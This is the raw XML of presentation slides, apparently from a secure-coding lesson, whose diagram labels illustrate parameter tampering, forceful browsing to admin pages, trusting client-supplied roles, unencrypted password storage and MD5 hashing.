          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013040" y="2168640"/>
            <a:ext cx="33303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1) Submit request with unexpected parameters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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="2057400"/>
            <a:ext cx="19202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2) Improper or no validation accepts parameters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3" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2325600" y="4800600"/>
            <a:ext cx="3200040" cy="68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3) Order is processed without requiring a payment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857160" y="704880"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Authentication Bypass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23" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1289160" y="1408680"/>
            <a:ext cx="3588480" cy="3780720"/>
            <a:chOff x="1289160" y="1408680"/>
            <a:chExt cx="3588480" cy="3780720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="124" name="Picture 4" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391200" y="1408680"/>
              <a:ext cx="716400" cy="924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25" name="Picture 6" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="1431720"/>
              <a:ext cx="716400" cy="870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6" name="TextBox 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="2237760"/>
              <a:ext cx="73080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/login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7" name="TextBox 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249360" y="2226960"/>
              <a:ext cx="1171440" cy="91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/restricted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128" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3363840" y="3612960"/>
              <a:ext cx="950400" cy="95040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129" name="Group 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1289160" y="3469680"/>
              <a:ext cx="1683720" cy="1498320"/>
              <a:chOff x="1289160" y="3469680"/>
              <a:chExt cx="1683720" cy="1498320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="130" name="Graphic 17" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1398960" y="3469680"/>
                <a:ext cx="950400" cy="9504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31" name="Graphic 18" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1734480" y="3652920"/>
                <a:ext cx="950400" cy="95040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32" name="TextBox 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1289160" y="4604040"/>
                <a:ext cx="168372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Regular Users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133" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384360" y="4551120"/>
              <a:ext cx="95832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134" name="Curved Connector 22"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="130" idx="0"/>
              <a:endCxn id="126" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="1576800" y="3171960"/>
              <a:ext cx="594000" cy="1800"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24984"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="135" name="Curved Connector 25"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="126" idx="2"/>
              <a:endCxn id="124" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1" rot="5400000">
              <a:off x="2129040" y="1613880"/>
              <a:ext cx="1005840" cy="1518840"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -17615"/>
                <a:gd name="adj2" fmla="val 41797"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="548235"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="136" name="Curved Connector 29"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="128" idx="0"/>
              <a:endCxn id="127" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="3600360" y="3373920"/>
              <a:ext cx="473760" cy="4320"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24942"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="TextBox 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836160" y="3032640"/>
              <a:ext cx="1041480" cy="1186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Forceful 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Browsing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Reliance on Untrusted Inputs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39" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2735640" y="1515240"/>
            <a:ext cx="2509560" cy="3506400"/>
            <a:chOff x="2735640" y="1515240"/>
            <a:chExt cx="2509560" cy="3506400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="140" name="Picture 3" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2934000" y="1515240"/>
              <a:ext cx="716400" cy="924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1" name="TextBox 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2735640" y="2387880"/>
              <a:ext cx="12920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/restricted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142" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2906640" y="3719520"/>
              <a:ext cx="950400" cy="95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TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2869200" y="4657680"/>
              <a:ext cx="10742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144" name="Curved Connector 7"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="142" idx="0"/>
              <a:endCxn id="141" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="2897640" y="3235320"/>
              <a:ext cx="968040" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="145" name="Oval Callout 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3609720" y="3115440"/>
              <a:ext cx="1479960" cy="748800"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="325490">
                  <a:alpha val="3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I'm admin ;)</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="20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6" name="Oval Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3765240" y="1515240"/>
              <a:ext cx="1479960" cy="748800"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="325490">
                  <a:alpha val="3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Hello admin!</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="20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825840" y="423720"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Missing/Incorrect Authorization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8" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078520" y="1260720"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="149" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039760" y="1337760"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003760" y="2143800"/>
            <a:ext cx="802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/login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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962600" y="2187720"/>
            <a:ext cx="947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/admin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2" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922760" y="3688200"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1856880" y="4640400"/>
            <a:ext cx="1074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Attacker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54" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="152" idx="0"/>
            <a:endCxn id="150" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1811160" y="3094200"/>
            <a:ext cx="1180800" cy="7560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24977"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="4445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155" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="150" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2570760" y="1596240"/>
            <a:ext cx="746280" cy="1077480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34507"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="548235"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="156" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="157" idx="2"/>
            <a:endCxn id="148" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="4084200" y="1527480"/>
            <a:ext cx="799200" cy="1189440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22757"/>
              <a:gd name="adj2" fmla="val 49833"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284720" y="2673720"/>
            <a:ext cx="11822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Forceful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Browsing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9" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80444" t="2193" r="2458" b="66608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481200" y="1298880"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385080" y="2157480"/>
            <a:ext cx="1008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/limited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54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7222" lnSpcReduction="10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Missing Encryption of Sensitive Data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1" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507320" y="1431720"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471320" y="2237760"/>
            <a:ext cx="802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/login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3" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390320" y="4101480"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532160" y="5104440"/>
            <a:ext cx="681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User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65" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="163" idx="0"/>
            <a:endCxn id="162" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1119240" y="3348000"/>
            <a:ext cx="1500120" cy="7560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25012"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="4445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166" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="161" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223720" y="1866960"/>
            <a:ext cx="1626840" cy="741960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33311"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="548235"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144160" y="3656160"/>
            <a:ext cx="2544480" cy="851400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="325490">
                <a:alpha val="3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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1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eve</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="16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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ABCDEFG</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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8" name="Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576240" y="1196280"/>
            <a:ext cx="2966400" cy="2302920"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="325490">
                <a:alpha val="2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169" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428360" y="1301760"/>
            <a:ext cx="1193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Database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70" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848760" y="1959120"/>
          <a:ext cx="2422800" cy="1281600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="576000"/>
                <a:gridCol w="839160"/>
                <a:gridCol w="1008000"/>
              </a:tblGrid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id</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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username</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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password</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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5163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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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5164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eve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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ABCDEFG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5165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200" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="c00000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</a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025680" y="4129560"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949000" y="5093280"/>
            <a:ext cx="1074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Attacker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73" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="171" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="5572800" y="3201120"/>
            <a:ext cx="1524240" cy="333000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16158"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142600" y="3634920"/>
            <a:ext cx="1484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Data breach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Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="176" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2116080" y="2339280"/>
            <a:ext cx="1137960" cy="2833200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36867"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="767171">
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp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851040" y="2858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Use of a Broken Crypto Algorithm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Cube 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204560" y="1675440"/>
            <a:ext cx="868320" cy="1328400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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176" name="Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253680" y="1675440"/>
            <a:ext cx="868320" cy="1328400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4798080" y="2013840"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180" name="Graphic 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="4695120"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298520" y="5654160"/>
            <a:ext cx="681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User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82" name="Curved Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="183" idx="2"/>
            <a:endCxn id="180" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="1011600" y="4067280"/>
            <a:ext cx="1254960" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25021"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="548235"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="3076560"/>
            <a:ext cx="1651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Secure Server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TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558440" y="3952080"/>
            <a:ext cx="21927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Expected File Hash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MD5,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1234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TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4190760" y="2795760"/>
            <a:ext cx="2880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MD5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(Expected File)=1234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6" name="Graphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5397480" y="3595320"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
